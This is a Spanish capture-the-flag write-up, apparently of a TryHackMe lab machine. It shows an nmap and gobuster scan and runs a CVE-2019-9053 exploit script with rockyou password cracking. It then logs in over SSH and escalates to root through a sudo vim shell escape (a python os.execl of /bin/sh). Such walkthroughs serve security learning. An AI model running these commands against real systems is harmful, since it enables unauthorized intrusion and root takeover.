CTF simple (SUID VIM)

┌──(docker㉿docker)-[~/Tryhackme]
└─$ cat nmap-scanep.txt 
# Nmap 7.94SVN scan initiated Sun Jan  5 17:29:05 2025 as: /usr/lib/nmap/nmap --privileged -Pn -p- --min-rate 5000 -sC -sV -oN nmap-scanep.txt 10.10.18.105
Nmap scan report for 10.10.18.105
Host is up (0.25s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.0.60
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 2 disallowed entries 
|_/ /openemr-5_0_1_3 
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Hacemos un escaneo de directorios;

┌──(docker㉿docker)-[~/Tryhackme]
└─$ gobuster dir -u 10.10.18.105 -w /opt/SecLists/Discovery/Web-Content/common.txt

/.htaccess            (Status: 403) [Size: 296]
/.hta                 (Status: 403) [Size: 291]
/.htpasswd            (Status: 403) [Size: 296]
/index.html           (Status: 200) [Size: 11321]
/robots.txt           (Status: 200) [Size: 929]
/server-status        (Status: 403) [Size: 300]
/simple               (Status: 301) [Size: 313] [--> http://10.10.18.105/simple/]
Progress: 4735 / 4736 (99.98%)
===============================================================
Finished
===============================================================

Abajo nos arroja la version buscamos un exploit para ello:

CVE-2019–9053

Usando el exploit

python cve.py -u http://10.10.18.105/simple --crack --wordlist /usr/share/wordlists/rockyou.txt

Como tenemos un servicio ssh corriendo por el puerto 2222

┌──(docker㉿docker)-[~/Tryhackme]
└─$ ssh mitch@10.10.18.105 -p 2222

The authenticity of host '[10.10.18.105]:2222 ([10.10.18.105]:2222)' can't be established.
ED25519 key fingerprint is SHA256:iq4f0XcnA5nnPNAufEqOpvTbO8dOJPcHGgmeABEdQ5g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.18.105]:2222' (ED25519) to the list of known hosts.
mitch@10.10.18.105's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ ls
user.txt
$ cat u
cat: u: No such file or directory
$ cat user.txt
G00d j0b, keep up!
$

Con SUID podemos ver:

mitch@Machine:/home$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

Agregamos:

/usr/bin/vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

y adentro:

:!sh

TENEMOS ROOT SEÑORESS

PreviousRootMe (SUID PYTHON)NextAlpinista (Wordpress)

Last updated 1 year ago